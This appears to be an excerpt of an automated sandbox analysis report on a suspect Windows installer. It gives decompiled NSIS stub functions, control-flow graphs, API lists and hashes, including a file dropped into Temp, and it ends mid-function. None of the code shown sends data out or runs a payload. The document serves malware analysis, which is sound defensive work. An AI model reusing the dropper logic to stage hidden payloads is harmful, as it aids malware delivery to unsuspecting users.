                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 1941528284-3466564555
                                                  • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                  • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                  • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                  • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 530 4069ff-406a32 wsprintfW LoadLibraryExW 528->530 529->528 531 4069f8-4069fa 529->531 531->530
                                                  C-Code - Quality: 100%
                                                  			E004069C5(intOrPtr _a4) {
                                                  				short _v576;
                                                  				signed int _t13;
                                                  				struct HINSTANCE__* _t17;
                                                  				signed int _t19;
                                                  				void* _t24;
                                                  
                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                  				if(_t13 > 0x104) {
                                                  					_t13 = 0;
                                                  				}
                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                  					_t19 = 1;
                                                  				} else {
                                                  					_t19 = 0;
                                                  				}
                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                  				return _t17;
                                                  			}









                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                  • wsprintfW.USER32 ref: 00406A17
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                  • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                  C-Code - Quality: 100%
                                                  			E00405B99(WCHAR* _a4) {
                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                  				int _t22;
                                                  				long _t23;
                                                  
                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                  				_v36.Owner = 0x4083f8;
                                                  				_v36.Group = 0x4083f8;
                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                  				_v36.Revision = 1;
                                                  				_v36.Control = 4;
                                                  				_v36.Dacl = 0x4083e8;
                                                  				_v16.nLength = 0xc;
                                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                  				if(_t22 != 0) {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  				_t23 = GetLastError();
                                                  				if(_t23 == 0xb7) {
                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                  						goto L1;
                                                  					}
                                                  					return GetLastError();
                                                  				}
                                                  				return _t23;
                                                  			}








                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                                                  • GetLastError.KERNEL32 ref: 00405BF0
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                  • GetLastError.KERNEL32 ref: 00405C0F
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BBF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 3449924974-2382934351
                                                  • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                  • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                  C-Code - Quality: 100%
                                                  			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				intOrPtr _v8;
                                                  				short _v12;
                                                  				short _t12;
                                                  				intOrPtr _t13;
                                                  				signed int _t14;
                                                  				WCHAR* _t17;
                                                  				signed int _t19;
                                                  				signed short _t23;
                                                  				WCHAR* _t26;
                                                  
                                                  				_t26 = _a4;
                                                  				_t23 = 0x64;
                                                  				while(1) {
                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                  					_t23 = _t23 - 1;
                                                  					_v12 = _t12;
                                                  					_t13 =  *0x40a5ac; // 0x61
                                                  					_v8 = _t13;
                                                  					_t14 = GetTickCount();
                                                  					_t19 = 0x1a;
                                                  					_v8 = _v8 + _t14 % _t19;
                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                  					if(_t17 != 0) {
                                                  						break;
                                                  					}
                                                  					if(_t23 != 0) {
                                                  						continue;
                                                  					} else {
                                                  						 *_t26 =  *_t26 & _t23;
                                                  					}
                                                  					L4:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = _t26;
                                                  				goto L4;
                                                  			}













                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061A5
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 004061C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3083371207
                                                  • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                  • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                  C-Code - Quality: 100%
                                                  			E00403C25() {
                                                  				void* _t1;
                                                  				void* _t2;
                                                  				void* _t4;
                                                  				signed int _t11;
                                                  
                                                  				_t1 =  *0x40a018; // 0xffffffff
                                                  				if(_t1 != 0xffffffff) {
                                                  					CloseHandle(_t1);
                                                  					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                  				}
                                                  				_t2 =  *0x40a01c; // 0xffffffff
                                                  				if(_t2 != 0xffffffff) {
                                                  					CloseHandle(_t2);
                                                  					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                  					_t11 =  *0x40a01c;
                                                  				}
                                                  				E00403C82();
                                                  				_t4 = E00405D74(_t11, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsqD5A.tmp\\", 7); // executed
                                                  				return _t4;
                                                  			}








                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C2A
                                                  • C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\, xrefs: 00403C5B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\
                                                  • API String ID: 2962429428-2375930221
                                                  • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                  • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                  • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                  • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->645 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 659 402c2a-402c39 644->659 660 40292e-402935 644->660 645->659 662 40165b-40165e 645->662 657 40160c-40160e 649->657 650->649 654 4015f1-4015f8 call 405c33 650->654 654->649 667 4015fa-4015fd call 405b99 654->667 663 401610-401615 657->663 664 401627-40162f 657->664 660->659 662->659 668 401624 663->668 669 401617-401622 GetFileAttributesW 663->669 664->641 664->642 672 401602 667->672 668->664 669->664 669->668 672->657
                                                  C-Code - Quality: 86%
                                                  			E004015C1(short __ebx, void* __eflags) {
                                                  				void* _t17;
                                                  				int _t23;
                                                  				void* _t25;
                                                  				signed char _t26;
                                                  				short _t28;
                                                  				short _t31;
                                                  				short* _t34;
                                                  				void* _t36;
                                                  
                                                  				_t28 = __ebx;
                                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                  				_t17 = E00405FE2(_t16);
                                                  				_t32 = _t17;
                                                  				if(_t17 != __ebx) {
                                                  					do {
                                                  						_t34 = E00405F64(_t32, 0x5c);
                                                  						_t31 =  *_t34;
                                                  						 *_t34 = _t28;
                                                  						if(_t31 != _t28) {
                                                  							L5:
                                                  							_t25 = E00405C16( *(_t36 + 8));
                                                  						} else {
                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                  								goto L5;
                                                  							} else {
                                                  								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                  							}
                                                  						}
                                                  						if(_t25 != _t28) {
                                                  							if(_t25 != 0xb7) {
                                                  								L9:
                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  							} else {
                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                  								if((_t26 & 0x00000010) == 0) {
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  						 *_t34 = _t31;
                                                  						_t32 = _t34 + 2;
                                                  					} while (_t31 != _t28);
                                                  				}
                                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                  					_push(0xfffffff5);
                                                  					E00401423();
                                                  				} else {
                                                  					E00401423(0xffffffe6);
                                                  					E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                  					if(_t23 == 0) {
                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  					}
                                                  				}
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 1892508949-3107243751
                                                  • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                  • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                  • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                  • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                  C-Code - Quality: 53%
                                                  			E0040603F(void* __eflags, intOrPtr _a4) {
                                                  				int _t11;
                                                  				signed char* _t12;
                                                  				long _t16;
                                                  				intOrPtr _t18;
                                                  				intOrPtr* _t21;
                                                  				signed int _t23;
                                                  
                                                  				E00406668(0x425f50, _a4);
                                                  				_t21 = E00405FE2(0x425f50);
                                                  				if(_t21 != 0) {
                                                  					E004068EF(_t21);
                                                  					if(( *0x42a278 & 0x00000080) == 0) {
                                                  						L5:
                                                  						_t23 = _t21 - 0x425f50 >> 1;
                                                  						while(1) {
                                                  							_t11 = lstrlenW(0x425f50);
                                                  							_push(0x425f50);
                                                  							if(_t11 <= _t23) {
                                                  								break;
                                                  							}
                                                  							_t12 = E0040699E();
                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                  								E00405F83(0x425f50);
                                                  								continue;
                                                  							} else {
                                                  								goto L1;
                                                  							}
                                                  						}
                                                  						E00405F37();
                                                  						_t16 = GetFileAttributesW(??); // executed
                                                  						return 0 | _t16 != 0xffffffff;
                                                  					}
                                                  					_t18 =  *_t21;
                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                  						goto L1;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				L1:
                                                  				return 0;
                                                  			}










                                                  APIs
                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                  • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00406098
                                                  • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004060A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: P_B
                                                  • API String ID: 3248276644-906794629
                                                  • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                  • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                  • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                  • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 709 407447-40744d 705->709 710 4074f0-407505 706->710 711 407507-40751a 706->711 707->709 713 407426-40743e 708->713 714 4075cf-4075d9 708->714 717 406bf2 709->717 718 4075fa 709->718 712 40751d-407524 710->712 711->712 719 4074c4 712->719 720 407526 712->720 713->707 716 4075e5-4075f8 714->716 726 4075fd-407601 716->726 721 406bf9-406bfd 717->721 722 406d39-406d5a 717->722 723 406c9e-406ca2 717->723 724 406d0e-406d12 717->724 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->716 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->716 729->718 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->716 736 406cc4-406cc8 732->736 733->716 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->718 748 406c81 743->748 744->736 745->744 745->745 746->718 746->741 747->746 748->737
                                                  C-Code - Quality: 99%
                                                  			E00407194() {
                                                  				signed int _t530;
                                                  				void _t537;
                                                  				signed int _t538;
                                                  				signed int _t539;
                                                  				unsigned short _t569;
                                                  				signed int _t579;
                                                  				signed int _t607;
                                                  				void* _t627;
                                                  				signed int _t628;
                                                  				signed int _t635;
                                                  				signed int* _t643;
                                                  				void* _t644;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					_t530 =  *(_t644 - 0x30);
                                                  					if(_t530 >= 4) {
                                                  					}
                                                  					 *(_t644 - 0x40) = 6;
                                                  					 *(_t644 - 0x7c) = 0x19;
                                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                  					while(1) {
                                                  						L145:
                                                  						 *(_t644 - 0x50) = 1;
                                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                  						while(1) {
                                                  							L149:
                                                  							if( *(_t644 - 0x48) <= 0) {
                                                  								goto L155;
                                                  							}
                                                  							L150:
                                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                  							 *(_t644 - 0x54) = _t643;
                                                  							_t569 =  *_t643;
                                                  							_t635 = _t569 & 0x0000ffff;
                                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                  							if( *(_t644 - 0xc) >= _t607) {
                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                  								_t628 = _t627 + 1;
                                                  								 *_t643 = _t569 - (_t569 >> 5);
                                                  								 *(_t644 - 0x50) = _t628;
                                                  							} else {
                                                  								 *(_t644 - 0x10) = _t607;
                                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                  							}
                                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                                  								L148:
                                                  								_t487 = _t644 - 0x48;
                                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                                  								L149:
                                                  								if( *(_t644 - 0x48) <= 0) {
                                                  									goto L155;
                                                  								}
                                                  								goto L150;
                                                  							} else {
                                                  								L154:
                                                  								L146:
                                                  								if( *(_t644 - 0x6c) == 0) {
                                                  									L169:
